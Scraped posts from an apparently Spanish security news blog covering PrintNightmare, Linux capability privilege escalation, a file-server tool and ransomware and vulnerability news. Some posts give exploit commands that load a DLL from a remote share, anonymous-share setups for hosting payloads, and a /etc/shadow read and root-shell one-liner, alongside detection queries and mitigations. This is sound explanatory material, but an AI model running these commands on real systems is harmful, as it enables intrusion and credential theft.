Finalmente BlackBerry publicó el reporte correspondiente (ahora parece haber desaparecido, pero es posible recuperarlo vía Internet Archive) y a su vez CISA también publicó una alerta que precisamente estaba centrada en cómo BadAlloc afectaba a QNX RTOS.

El silencio de BlackBerry

La vulnerabilidad, identificada como CVE-2021-22156 puede ser explotada remotamente y puede llevar a la ejecución de código arbitrario y a forzar la denegación de servicio del sistema afectado. Un conjunto de riesgos más que suficiente como para que BlackBerry hubiera informado inmediatamente sobre ello, se hubiera puesto manos a la obra para solucionarlo, y en este momento los parches para los dispositivos afectados ya estuvieran en camino.

Pero no, BlackBerry optó por silenciarlo y, lo que es peor aún, tras publicar en su web una alerta sobre la vulnerabilidad, posteriormente han elegido borrarla, pese a que sigue estando enlazada desde múltiples webs, incluida al de la CISA, que informan sobre la incidencia.

En CISA aseguran que el software se usa en un amplio catálogo de productos y de verse comprometidos, eso podría representar «un riesgo creciente para funciones críticas de la nación

180 comentarios

Gestionando y administrando ficheros en nuestra propia nube privada con httpsweet

Publicada el 05/09/2021 - 05/09/2021 por Anonymous Chile

HTTPSweet es un servidor HTTP para descargar y subir archivos fácilmente que nos ofrece algunas opciones más interesantes.

Instalación

  • Desde paquetes de Python:

$ pip3 install httpsweet

  • Desde el repositorio:

$ git clone https://gitlab.com/Zer1t0/httpsweet
$ cd httpsweet/
$ python3 setup.py install

  • Y lanzamos el servidor:

$ httpsweet
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) …

Fue creado teniendo en cuenta la flexibilidad, lo que permite su uso en muchas situaciones e implementar la misma operación de muchas formas diferentes.

  • Descargar un fichero:

curl 127.0.0.1:8000/test
curl 127.0.0.1:8000/?path=test
curl 127.0.0.1:8000/ -d ‘action=download&path=test’

  • Descargar parte de un fichero:

curl ‘127.0.0.1:8000/test?offset=10&size=20’
curl ‘127.0.0.1:8000/?offset=10&size=20&path=test’
curl 127.0.0.1:8000/ -d ‘action=download&offset=10&size=20&path=test’

  • Subir un fichero:

curl 127.0.0.1:8000/test_up -H «Content-Type: application/octet-stream» –data ‘thedata’
curl localhost:8000/test_up -H «Content-Type: application/octet-stream» –data-binary «@/etc/hosts»
curl ‘127.0.0.1:8000/test_up?action=upload_file&data=thedata’

  • Subir un fichero adjuntando:

curl 127.0.0.1:8000/test_app?append=t -H «Content-type: application/octet-stream» –data «thedata»
curl ‘127.0.0.1:8000/test_app?action=upload_file&data=thedata&append=t’

  • Subir encodeado en base64:

curl 127.0.0.1:8000/test_64?encoding=64 -H ‘Content-type: application/octet-stream’ –data ‘dGhlZGF0YQo=’
curl ‘127.0.0.1:8000/?action=upload_file&path=test_64&data=dGhlZGF0YQo&encoding=64’

HTTPS

Además también es compatible con HTTPS, para el cual debe proporcionar un certificado con una clave privada, utilizando los parámetros –cert y –key. En caso de generar un certificado que también incluya la clave privada, solo se debe utilizar el parámetro –cert.

  • Para generar un autocertificado automático, podemos usar los siguientes comandos.

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365
cat key.pem >> cert.pem # generate cert with the private key

Listado de directorios

  • Por defecto el listado de directorios está desactivado, en caso de que queramos activarlos hay que pasarle el parámetro –dir-list.

$ httpsweet –cert cert.pem –dir-list
Enter PEM pass phrase:
Serving HTTPS on 0.0.0.0 port 8000 (https://0.0.0.0:8000/)

Tipos de solicitudes

Para determinar la acción requerida en cada solicitud, el servidor examina las siguientes partes de la solicitud:

  • Método

POST | PUT :: Indican la subida
Resto de métodos :: Indican descarga

  • URL

Ruta de la URL :: Indica la ruta del archivo deseado
Parámetros de la URL :: Indica los parámetros de la acción

  • Cuerpo, que puede ser

Datos brutos :: Indica el contenido del archivo
Parámetros codificados en la URL :: Indica los parámetros de la acción
Datos Json :: Indica los parámetros de la acción

Cabeceras :: Indica los parámetros de la acción
Cookies :: Indica los parámetros de la acción. Dado que la clave de ruta tiene un significado especial en las cookies, no es posible utilizar ese parámetro en estos campos.

Las partes más relevantes son las que se encuentran en las últimas posiciones de la lista. Esto significa, por ejemplo, que si la ruta de la URL indica la ruta index.html, pero hay una ruta de parámetro (en la URL o en el Cuerpo) que indica otro_archivo.txt, entonces se seleccionará otro_archivo.txt como la ruta deseada.

Campos clave-valor (Url, Body, Headers, Cookies)

En todos estos campos que pueden especificar los parámetros de la acción, se pueden proporcionar los siguientes valores:

acción: str :: Determina la acción
path: str :: Indica la ruta del archivo deseado
offset: int :: (Download) Indica el punto de partida para la lectura de un archivo
size: int :: (Download) Indica el número de bytes leídos
append: flag :: (Carga) Indica si los datos deben añadirse al archivo deseado
encoding: str :: Indica el codificador que se desea utilizar en las acciones, actualmente sólo se soporta base64 (o no codificador)
data: str :: (Upload) Los datos a escribir en el archivo deseado

Proyecto: https://github.com/eloypgz/httpsweet

Vulnerabilidad RCE en Windows involucra al servicio Windows Print Spooler

Publicada el 05/09/2021 - 05/09/2021 por Anonymous Chile

Como ya muchos saben, Microsoft confirmó oficialmente que la vulnerabilidad CVE-2021-34527 de ejecución remota de código (RCE) aka «PrintNightmare» que afecta al servicio Windows Print Spooler es diferente del problema que la compañía abordó como parte de su actualización del Patch Tuesday, al tiempo que se advirtió que se estaba ejecutando in-the-wild.

Su criticidad (posibilidad de ejecutar código como SYSTEM) y la aparición de exploits funcionales hacen vital tomar las contramedidas urgentemente que, básicamente, consisten en deshabilitar el servicio de impresión. Aunque por el momento son workarounds hasta la aparición del parche oficial, evitarán que inexorablemente cualquier usuario malintencionado o atacante se convierta en administrador de dominio fácilmente.

En la presente ocasión, recogemos de manera bastante esquemática distintos aspectos de esta nueva y auténtica pesadilla para Windows…

Flujo de explotación

Exploits

CVE-2021-1675 (implementaciones en C# y Python)
PrintNightmare

Ejemplos:

./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 ‘\\192.168.1.215\smb\addCube.dll’
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 ‘C:\addCube.dll’

Hostear payloads

GNU/Linux:

Configurar /etc/samba/smb.conf para permitir el acceso anónimo:

[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = smbuser

Windows

mkdir C:\share
icacls C:\share\ /T /grant Anonymous` logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess ‘ANONYMOUS LOGON’,’Everyone’
REG ADD «HKLM\System\CurrentControlSet\Services\LanManServer\Parameters» /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD «HKLM\System\CurrentControlSet\Services\LanManServer\Parameters» /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD «HKLM\System\CurrentControlSet\Control\Lsa» /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD «HKLM\System\CurrentControlSet\Control\Lsa» /v RestrictAnonymous /t REG_DWORD /d 0 /f
# Reboot

Escaneo de equipos vulnerables

rpcdump.py @192.168.1.10 | grep MS-RPRN
Protocol: [MS-RPRN]: Print System Remote Protocol

Vídeo de la prueba de concepto:

Detección

  • SYSMON

// Based on https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/tree/master/Exploits/Print%20Spooler%20RCE
// adapted for Sysmon
let RegistryMods = Sysmon
| where EventID == 13
| where RegistryKey has_any («Data File», «Configuration File») and RegistryKey has «Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3»
| project TimeGenerated, ProcessGuid, ProcessPath, RegistryKey, RegistryKeyDetails;
Sysmon
| where EventID == 11
| where ProcessPath endswith «spoolsv.exe»
| where FileName has «spool\\drivers\\x64\\3\\»
| join kind=inner RegistryMods on ProcessGuid
| where TimeGenerated1 >= TimeGenerated
| where FileName has RegistryKeyDetails1
| where RegistryKeyDetails1 !in («kernelbase.dll», «FXSUI.DLL», «PrintConfig.dll», «PS5UI.DLL», «unishare.gpd»)
| project TimeGenerated, ProcessGuid, FileName, RegistryKeyDetails1
| sort by TimeGenerated desc

  • CROWDSTRIKE

// Based on https://www.reddit.com/r/crowdstrike/comments/oblzcl/20210701_cool_query_friday_printnightmare_poc/
// Query for Registry Mods
event_simpleName=ProcessRollup2
| rename FileName as PE, ImageFileName as PE_Path, TargetProcessId_decimal as ContextProcessId_decimal
| where PE==»spoolsv.exe»
| join ContextProcessId_decimal, aid
[search event_simpleName=AsepValueUpdate (RegObjectName=»\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\*\\Data File» OR RegObjectName=»\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\*\\Configuration File»)]
| lookup local=true aid_master aid OUTPUT Version MachineDomain OU SiteName
| eval ProductType=case(ProductType = «1»,»Workstation», ProductType = «2»,»Domain Controller», ProductType = «3»,»Server»)
| where ProductType==»Server» OR ProductType==»Domain Controller»
| stats values(TargetFileName) by ContextProcessId_decimal, aid, ProductType

// Query for File Writes
event_simpleName=ProcessRollup2
| rename FileName as PE, ImageFileName as PE_Path, TargetProcessId_decimal as ContextProcessId_decimal
| where PE==»spoolsv.exe»
| join ContextProcessId_decimal, aid
[search event_simpleName=PeFileWritten TargetFileName=*Windows\\System32\\spool\\drivers\\x64\\3\New\\*]
| lookup local=true aid_master aid OUTPUT Version MachineDomain OU SiteName
| eval ProductType=case(ProductType = «1»,»Workstation», ProductType = «2»,»Domain Controller», ProductType = «3»,»Server»)
| where ProductType==»Server» OR ProductType==»Domain Controller»
| stats values(TargetFileName) by ContextProcessId_decimal, aid, ProductType

  • DFE

// Based on https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/tree/master/Exploits/Print%20Spooler%20RCE
DeviceFileEvents
| where FolderPath contains @»\system32\spool\drivers\x64\3\»
| where FileName endswith «.dll»
| where ActionType in («FileCreated», «FileRenamed»)
| join kind=inner DeviceRegistryEvents on DeviceId,DeviceName,InitiatingProcessFileName, InitiatingProcessId
| where FileName !in («UNIDRV.DLL», «kernelbase.dll»)
| where Timestamp1 >= Timestamp

Contramedidas

  • Opción 1: deshabilitar el servicio de cola de impresión

Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled

  • Opción 2: deshabilitar la impresión remota entrante a través de la directiva de grupo

Configuración del equipo / Plantillas administrativas / Impresoras
Desactivar la política «Permitir que la cola de impresión acepte conexiones de cliente:» para bloquear ataques remotos.

  • Opción 3: restringir el acceso a directorio donde se dropean las DLLs

El exploit funciona colocando una DLL en un subdirectorio en C:\Windows\System32\spool\drivers
Al restringir las ACL en este directorio (y subdirectorios) podemos evitar que el servicio de cola de impresión introduzca DLL maliciosas.

$Path = «C:\Windows\System32\spool\drivers»
$Acl = (Get-Item $Path).GetAccessControl(‘Access’)
$Ar = New-Object System.Security.AccessControl.FileSystemAccessRule(«System», «Modify», «ContainerInherit, ObjectInherit», «None», «Deny»)
$Acl.AddAccessRule($Ar)
Set-Acl $Path $Acl

  • Opción 4: Parches no oficiales

Free Micropatches for PrintNightmare Vulnerability (CVE-2021-34527)

Abusando de las capabilities para escalar privilegios en sistemas *nix (Unix/Linux)

Publicada el 05/09/2021 - 08/09/2021 por Anonymous Chile

En sistemas *nix (Unix/Linux) un proceso ejecutándose con privilegios de superusuario o un ejecutable con el bit suid otorga muchas veces permisos demasiado altos durante la ejecución del programa. Es como un «todo o nada» y por lo tanto uno de los principales objetivos que posiblemente podría explotar un eventual hacker.

Con el objetivo de mitigar o contrarrestar dicha situación se dividieron todas las posibles llamadas del núcleo privilegiadas en grupos de funcionalidades relacionadas, las llamadas capabilities, que pueden asignarse a un ejecutable. De esa manera, cualquier posible problema de seguridad en un programa minimizará el impacto porque el atacante obtendrá sólo el subconjunto asignado de capacidades, no el acceso a todo el sistema.

No obstante, también podemos abusar de las capabilities. De hecho, en algunos ejercicios nos podremos encontrar un escenario similar al siguiente, que nos permitirá escalar privilegios en máquinas boot2root.

Lo primero que haremos es buscar de forma recursiva archivos con capabilities:

$ getcap -r / 2>/dev/null

/home/john/zip = cap_dac_read_search+ep
/home/peter/perl = cap_setuid+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/mtr-packet = cap_net_raw+ep

La extención «+ep» significa que la capability es efectiva y permitida.

Lo que llama la atención es el binario zip que tiene la capacidad o capability cap_dac_read_search. Si leemos el man page, podemos ver que esto permite que zip omita las comprobaciones de permisos de lectura, lo que significa que podemos leer cualquier archivo en el sistema de archivos.

Es decir, podemos por ejemplo leer /etc/shadow para crackear hashes y/u obtener las claves privadas SSH de los usuarios.

El proceso es sencillo:

  1. Comprimimos el archivo o carpeta que deseamos leer: /path/to/zip /tmp/shadow.zip /etc/shadow.
  2. Lo descomprimimos: unzip /tmp/shadow.zip -d /tmp.
  3. Listo, podemos leer el archivo: cat /tmp/etc/shadow.

Una vez obtenido las credenciales entrando como el usuario peter o john podemos acceder y usar otro ejecutable con capabilities: perl, que nos permite cambiar el UID (cap_setuid). Así que simplemente ejecutamos:

$ /home/peter/perl -e ‘use POSIX (setuid); POSIX::setuid(0); exec «/bin/bash»;’

¡Voilà, tenemos accesos y privilegios de superusuario!

Gigabyte sufre ciberataque por infección de ransomware

Publicada el 23/08/2021 por Anonymous Chile

La compañía tecnológica taiwanesa Gigabyte confirmó que sus sistemas fueron infectados por ransomware y los responsables del ataque amenazan con filtrar más de 112 GB de información confidencial si la compañía no acepta sus demandas.

El fabricante taiwanés de placas base Gigabyte ha sido atacado por la banda de ransomware RansomEXX, que amenaza con publicar 112 GB de datos robados a menos que se pague un rescate. Gigabyte es conocido por sus placas base, pero también fabrica otros componentes y hardware de ordenadores, como tarjetas gráficas, servidores de centros de datos, computadoras portátiles y monitores.

Un portavoz de Gigabyte confirmó que el incidente no afectó los sistemas de producción y que solo unos pocos servidores internos en su sede de Taiwán se han visto afectados, por lo que fueron aislados por seguridad. La compañía sigue investigando cómo es que los cibercriminales lograron comprometer los sistemas, robar la información confidencial y cifrar los archivos locales.

A pesar de que la compañía no reveló la identidad de los actores de amenazas, un reporte posterior señala que el ataque fue atribuido a RansomExx, un grupo de ransomware que suele comprometer redes empresariales y filtrar archivos de las víctimas renuentes a pagar el rescate.

Este grupo de hacking se caracteriza por una nota de rescate muy clara y breve. En el caso de GIGABYTE, la nota se compone apenas de un par de líneas: “Hemos descargado 112 GB de sus archivos y estamos listos para publicar la información. Muchos de ellos están bajo NDA (Intel, AMD, American Megatrends)”, señala la nota de extorsión.

El ataque ocurrió por la noche del día Martes 3 de Agosto del presente año en curso 2021 hasta el día Miércoles 4 de Agosto del mismo año, obligando a la empresa a cerrar los sistemas en Taiwán. El incidente también afectó a varios sitios web de la empresa, incluido su sitio de soporte y partes del sitio web taiwanés.

Equipo de Soporte de Gigabyte afectado por el Ciberataque

Los clientes también han informado problemas para acceder a los documentos de soporte o recibir información actualizada sobre RMA, lo que probablemente se deba al ataque de ransomware. Según el sitio de noticias chino United Daily News, Gigabyte confirmó que sufrieron un ciberataque que afectó a una pequeña cantidad de servidores.

Algunas de las imágenes filtradas, incluyen documentos confidenciales junto a un manual de depuración de American Megatrends, un documento de Intel llamado «Problemas potenciales», un «Programa de actualización de la pila de SKU de Ice Lake D» y una guía de revisión de AMD. Este ataque es el último de una larga lista de incidentes de ransomware que han afectado al sector tecnológico de Taiwán en los últimos años. Las víctimas anteriores incluyen Acer, AdvanTech, Compal, Quanta y Garmin.

Vulnerabilidad física en módulos TPM permite hackear portátil de empresa en una auditoría

Publicada el 23/08/2021 - 11/10/2021 por Anonymous Chile

Los investigadores de seguridad de la consultora Dolos Group, contratados para auditar y comprobar la seguridad de la red de un cliente, recibieron un ordenador portátil Lenovo preconfigurado para usar los estándares de seguridad de la organización, incluyendo TPM. No recibieron usuarios ni contraseñas, detalles de configuración ni cualquier otra información sobre la máquina, para emular lo que se encontraría un atacante que robara físicamente el portátil.

Cómo robando un portátil bien protegido se puede acceder a la red interna de una empresa

Un análisis de la configuración de la BIOS, la operación de arranque y el hardware reveló rápidamente que las medidas de seguridad implementadas podrían evitar los ataques habituales, incluyendo:

  • SecureBoot habilitado.
  • BIOS protegida con contraseña.
  • Boot BIOS bloqueada para evitar el inicio desde USB.
  • SSD cifrado con BitLocker usando módulo TPM.
  • Ataques PCILeech / DMA porque la protección VT-d BIOS de Intel estaba habilitada.
  • La autenticación omite el uso de herramientas como Kon-boot.
  • Uso de herramientas como LAN turtle y Responder para extraer datos con adaptadores Ethernet USB.

Vulnerabilidad física en los módulos TPM

TPM (Trusted Module Platform) son, a día de hoy, un elemento clave en la seguridad de los sistemas. Tanto es así que, como bien sabrás, Microsoft solo permitirá la instalación de Windows 11 en sistemas dotados con este sistema de seguridad (salvo algunas excepciones), poniendo en una situación complicada a usuarios de sistemas antiguos que no cuentan con chip TPM y que tampoco tienen la posibilidad de instalarlo.

Con poco más para poder continuar, los investigadores se enfocaron en el módulo de plataforma confiable o Trusted Platform Module (TPM), un chip altamente reforzado instalado en la placa base del portátil que se comunica directamente con otro hardware instalado en la máquina. Los investigadores se dieron cuenta de que como es el valor predeterminado para el cifrado del disco duro con BitLocker de Microsoft, el portátil arrancaba directamente en la pantalla de Windows sin que se solicitara ingresar un PIN o contraseña, lo que significa que el TPM era el lugar donde se almacenaba la clave criptográfica para desbloquear la unidad.

Microsoft recomienda anular el valor predeterminado y utilizar un PIN o contraseña, pues de esta manera haría falta que el atacante tuviera conocimientos muy avanzados y que desmontara el portátil e hiciera cierto trabajo de soldadura en el módulo TPM para acceder a él. Sin embargo, los investigadores dijeron al respecto que el consejo de Microsoft es inadecuado:

Un atacante pre-equipado podría realizar toda la cadena de ataque en menos de 30 minutos sin soldar, con hardware simple y barato y con herramientas disponibles públicamente, lo que coloca a este proceso directamente al alcance de cualquier usuario con conocimientos avanzados.

Los módulos TPM tienen múltiples capas de defensa que evitan que los atacantes extraigan o manipulen los datos que almacenan. Por ejemplo, un análisis realizado en el año 2010 reveló que un chip TPM fabricado por Infineon fue diseñado para autodestruirse si se le penetraba físicamente. Con pocas esperanzas de romper el chip dentro del portátil, los investigadores buscaron otras formas con las que poder extraer la clave que descifraba el disco duro, y se dieron cuenta de que el TPM se comunicaba con la CPU mediante una interfaz en serie, un protocolo de comunicaciones para sistemas integrados.

Abreviado como SPI, el firmware no proporciona capacidades de cifrado propias, por lo que cualquier cifrado debe ser manejado por los dispositivos con los que se comunica el TPM y no por éste. BitLocker no utiliza ninguna de las funciones de comunicación cifradas del último estándar TPM 2.0, así que si los investigadores pudieran aprovechar la conexión entre el TPM y la CPU, podrían extraer la clave de cifrado y acceder a todo el contenido del portátil.

Así pues, los investigadores conectaron un analizador lógico al chip CMOS de la placa base del portátil, y en poco tiempo lograron extraer cada byte que se movía a través del chip. Luego, utilizaron el kit de herramientas bitlocker-spi-tool para aislar la clave dentro de esta masa de datos obtenida y ¡bingo!, ya pudieron eliminar el cifrado del disco, y todo gracias al TPM.

Con el disco duro descifrado, los investigadores revisaron su contenido en busca de contraseñas o archivos confidenciales que los ayudaran a acceder a la red del cliente.

TPM es seguro, su implementación no tanto…

Dada la seguridad que ofrece el chip TPM, muchos ataques quedan descartados, por lo que los investigadores probaron un enfoque distinto, es decir, buscaron debilidades relacionadas con el propio chip y su integración en el sistema. Con la configuración más habitual, al arrancar el sistema se inicia directamente Windows, sin un paso previo en el que sea necesario introducir una contraseña. Una única clave, almacenada en el chip, con la que se desbloquea el sistema.

La construcción de los propios chips TPM hace que intentar acceder directamente a su contenido sea prácticamente imposible. Incluso se afirma que hay algunos modelos con una función de autodestrucción física en caso de detectar intentos de acceder a su interior. Por su parte, los puntos que unen el chip a a placa son tan pequeños que, en la práctica, resulta casi imposible soldar algo a los mismos para intentar acceder a los datos que se transmiten desde y hacia el integrado.

¿Y para qué serviría acceder a dicho tráfico de datos? Aquí es cuando tenemos que saber que la conexión del TPM a la CPU se realiza mediante un bus SPI (Serial Peripheral Interface) y que, debido a la implementación de seguridad de BitLocker, situar un sniffer en ese bus de datos podría permitir hacerse con la clave de descifrado de la unidad de almacenamiento del sistema, ya que esta se transmite sin cifrar.

Lo ideal, por seguridad, sería que el TPM tuviera un bus exclusivo que lo conectara con la CPU, pero por cuestiones de diseño y de costes, resulta que el mismo bus empleado en esta conexión es empleado, también, por otros componentes de la placa base, entre ellos, el chip CMOS que aloja la BIOS del sistema. ¿Y qué particularidad tiene este chip? Pues que a diferencia del TPM, los pines que lo conectan a la placa base son de gran tamaño, por lo que conectar algo a los mismos es muchísimo más sencillo.

El siguiente paso era analizar todo el tráfico de datos del bus SPI al que estaban conectadas tanto la BIOS como el chip TPM, filtrando todos los datos para extraer la clave de cifrado. No les llevó demasiado tiempo aprovechar los accesos del sistema al disco duro para lograr acceso al contenido de la unidad de almacenamiento. Desde ese mismo momento, la guerra ya estaba ganada, los investigadores ya habían logrado la clave necesaria para descifrar el contenido del disco.

Peligrosa campaña de hacking se esparce abusando de grave vulnerabilidad en Router Livebox Fibra Arcadyan de Orange

Publicada el 23/08/2021 por Anonymous Chile

La vulnerabilidad CVE-2021-20090 que también afecta a los routers LiveBox de Orange de la marca Arcadyan, están siendo explotados activamente para hackear a millones de dispositivos IoT en todo el mundo. El error explotado activamente permite omitir la autenticación en millones de routers expuestos en internet. Por suerte y como comentan en bandaancha.eu la vulnerabilidad ya fue solucionada por Orange.

La vulnerabilidad rastreada como CVE-2021-20090 es una vulnerabilidad crítica (gravedad calificada 9.9 / 10) en las interfaces web de routers con firmware Arcadyan que permite a atacantes remotos no autenticados eludir la autenticación. Los actores de amenazas explotan activamente una vulnerabilidad de derivación de autenticación crítica, rastreada como CVE-2021-20090, que afecta a los enrutadores domésticos con firmware Arcadyan para implementar un payload de la botnet Mirai.

Una vulnerabilidad de recorrido de ruta en las interfaces web de Buffalo WSR-2533DHPL2 versión de firmware <= 1.02 y WSR-2533DHP3 versión de firmware <= 1.24 podría permitir que atacantes remotos no autenticados eludan la autenticación.
Tenable.

Esta falla afecta potencialmente a millones de dispositivos IOT fabricados por no menos de 17 proveedores, incluidos algunos ISP Españoles (Orange, Vodafone), un Mexicano (Telmex) y un Argentino (Telecom). Los ataques en curso fueron detectados por investigadores de Juniper Threat Labs, los expertos creen que fueron realizados por un actor de amenazas que se dirigió a los dispositivos de IoT en una campaña desde febrero.

“A partir del 5 de agosto, identificamos algunos patrones de ataque que intentan explotar esta vulnerabilidad en la naturaleza proveniente de una dirección IP ubicada en Wuhan, provincia de Hubei, China. El atacante parece estar intentando implementar una variante de Mirai en los enrutadores afectados utilizando scripts similares en nombre a los mencionados por Palo Alto Networks en marzo. Habíamos sido testigos de la misma actividad a partir del 18 de febrero», expresa el análisis publicado por los expertos de Juniper. «La similitud podría indicar que el mismo actor de amenazas está detrás de este nuevo ataque e intenta actualizar su arsenal de infiltración con otra vulnerabilidad recién revelada».

Los ataques en curso fueron descubiertos por los investigadores de Juniper Threat Labs mientras monitoreaban la actividad de un actor de amenazas conocido por atacar la red y los dispositivos de IoT desde febrero.

Según los expertos, entre el 6 de junio y el 23 de julio del presente año en curso 2021, el actor de amenazas comenzó a explotar las siguientes vulnerabilidades:

  • CVE-2020-29557 (enrutadores DLink)
  • CVE-2021-1497 y CVE-2021-1498 (Cisco HyperFlex)
  • CVE-2021-31755 (Tenda AC11)
  • CVE-2021-22502 (MicroFocus OBR)
  • CVE-2021-22506 (MicroFocus AM)
  • Un par de exploits más de exploit-db sin CVE relacionados.

Modelos Routers Vulnerables

Los dispositivos vulnerables incluyen docenas de modelos de enrutadores de múltiples proveedores e ISP, incluidos Asus, British Telecom, Deutsche Telekom, Orange, O2 (Telefónica), Verizon, Vodafone, Telstra y Telus. Según la cantidad de modelos de enrutadores y la larga lista de proveedores afectados por este error, es probable que la cantidad total de dispositivos expuestos a ataques llegue a millones de routers.

Lista estructurada en Fabricante – Modelo – Firmware:

La falla CVE-2021-20090 existió en el firmware de Arcadyan durante al menos diez años, esto significa que todos los proveedores que lo usaron en sus modelos heredaron automáticamente el error. Los investigadores también compartieron indicadores de compromiso (IOC) asociados con la última ola de ataques atribuidos a este actor de amenazas. El fallo de seguridad fue descubierta por Tenable, que publicó un aviso de seguridad el 26 de abril y agregó un código de explotación de prueba de concepto el martes 3 de agosto.

Esta vulnerabilidad en el firmware de Arcadyan ha existido durante al menos 10 años y, por lo tanto, se ha abierto camino a través de la cadena de suministro en al menos 20 modelos de 17 proveedores diferentes, y eso se menciona en un documento técnico que Tenable ha publicado.
Evan Grant. Ingeniero de Investigaciones de Tenable Staff

Desde el pasado Jueves 6 de Agosto, Juniper Threat Labs «identificó algunos patrones de ataque que intentan explotar esta vulnerabilidad en la naturaleza proveniente de una dirección IP ubicada en Wuhan, provincia de Hubei, China». Los actores de amenazas detrás de esta actividad de explotación en curso utilizan herramientas maliciosas para implementar una variante de botnet Mirai, similar a las utilizadas en una campaña Mirai dirigida a dispositivos de seguridad de red y IoT, descubiertas por investigadores de la Unidad 42 en marzo.

La similitud podría indicar que el mismo actor de amenazas está detrás de este nuevo ataque e intenta actualizar su arsenal de infiltración con otra vulnerabilidad recién revelada.
Juniper Threat Labs.

Los investigadores detectaron por primera vez la actividad de los actores de amenazas el 18 de febrero. Desde entonces, han agregado continuamente nuevos exploits a su arsenal, siendo el que apunta a CVE-2021-20090 el último incluido a principios de esta semana, y es más probable que se produzcan.

Dado que es posible que la mayoría de las personas ni siquiera sean conscientes del riesgo de seguridad y no actualizarán su dispositivo en el corto plazo, esta táctica de ataque puede ser muy exitosa, barata y fácil de llevar a cabo.

Los indicadores de compromiso (IOC), incluidas las direcciones IP utilizadas para lanzar los ataques y los hash de muestra, están disponibles al final del informe de Juniper Threat Labs.

CVE-2021-20090 (path transversal auth bypass) y CVE-2021-20091 (inyección de archivo de configuración RCE).

Filtrados guías y manuales técnicos de uso y manejo del ransomware Conti

Publicada el 16/08/2021 - 06/10/2021 por Anonymous Chile

Un miembro descontento del programa de ransomware Conti ha filtrado manuales y guías técnicas en ruso utilizados por la banda Conti para capacitar a los miembros afiliados sobre cómo acceder, moverse lateralmente y escalar el acceso dentro de una empresa hackeada y luego exfiltrar sus datos antes de cifrar los archivos.

Afiliado de ransomware descontento filtra los manuales técnicos de la pandilla Conti

Filtrados en el foro de habla rusa XSS, los archivos fueron compartidos por una persona que parece haber tenido un problema con la baja cantidad de dinero que la pandilla Conti les estaba pagando para hackear las redes corporativas.

En los mensajes enviados por correo no deseado a través del foro, el individuo compartió capturas de pantalla de las direcciones IP donde la pandilla de Conti aloja los servidores de comando y control de Cobalt Strike, que los miembros afiliados de Conti utilizan para acceder a las redes de la empresa hackeadas.

Además, la persona también publicó un archivo RAR llamado «Мануали для работяг и софт.rar», que se traduce aproximadamente como «Manuales para trabajadores y software.rar».

Este archivo contiene 37 archivos de texto con instrucciones sobre cómo utilizar varias herramientas de piratería e incluso software legítimo durante una intrusión en la red.

Por ejemplo, los manuales filtrados contienen guías sobre cómo:

Técnicas Hacking ransomware Conti

  • Configurar el software Rclone con una cuenta MEGA para la exfiltración de datos.
  • Configurar el software AnyDesk como una solución de persistencia y acceso remoto en la red de una víctima (una táctica conocida de Conti).
  • Configurar y usar el agente Cobalt Strike.
  • Utilizar la herramienta NetScan para escanear redes internas.
  • Instalar el marco de prueba pentesting Metasploit en un servidor privado virtual (VPS).
  • Conectarse a redes hackeadas a través de RDP utilizando un túnel seguro de Ngrok.
  • Elevar y obtener derechos de administrador dentro de la red hackeada de una empresa.
  • Hackear (elevar privilegios) de los controladores de dominio.
  • Volcar contraseñas de directorios activos (volcado NTDS).
  • Realizar ataques de fuerza bruta SMB.
  • Ataques fuerza bruta routers, dispositivos NAS y cámaras de seguridad.
  • Utilizar el exploit ZeroLogon.
  • Realizar un ataque Kerberoasting.
  • Deshabilitar las protecciones de Windows Defender.
  • Eliminar instantáneas de volumen.
  • Cómo los afiliados pueden configurar sus propios sistemas operativos para usar la red de anonimato Tor, y más

Descargar manuales en inglés

Especialistas en ciberseguridad mencionan que las filtraciones en operaciones RaaS son algo muy poco común, por lo que sin dudas este es un hecho que llama la atención. No obstante, los expertos también consideran que la información compartida en esta filtración no incluye nada que la comunidad de la ciberseguridad no hubiera descubierto anteriormente, incluso mencionan que estas técnicas y procedimientos han sido utilizadas por operaciones de ransomware desde hace años.

Aún así, esta filtración ayudará a algunas empresas de seguridad a elaborar manuales defensivos actualizados y más sólidos con el fin de que las organizaciones públicas y privadas puedan detectar de mejor manera cualquier intrusión de Conti y otras variantes de ransomware similares.

Servicio de salud italiano es víctima de ciberataque por ransomware

Publicada el 16/08/2021 por Anonymous Chile

El ataque informático afecta al sistema sanitario de la región de Lazio y, aunque han podido aislar a los sistemas infectados, aún no han descubierto la puerta de entrada del ransomware. El servicio italiano de salud de Lazio ha sufrido el mayor ciberataque de su historia después de que unos ciberdelincuentes consiguieran paralizar el sistema de reserva de citas para vacunarse contra el coronavirus. El ataque afecta a la región de Lazio, una de las más pobladas de Italia y a la que pertenece la capital, Roma.

Ciberataque ransomware bloquea el sistema sanitario de Lazio

«Estamos sufriendo un ataque de matriz terrorista. Somos víctimas de una ofensiva criminal, probablemente la más grave que se haya producido nunca en el territorio de nuestro país. La situación es muy seria y muy grave». Las palabras que utilizó este lunes Nicola Zingaretti, presidente del Lacio, la segunda región italiana más poblada y donde se encuentra la capital, Roma,

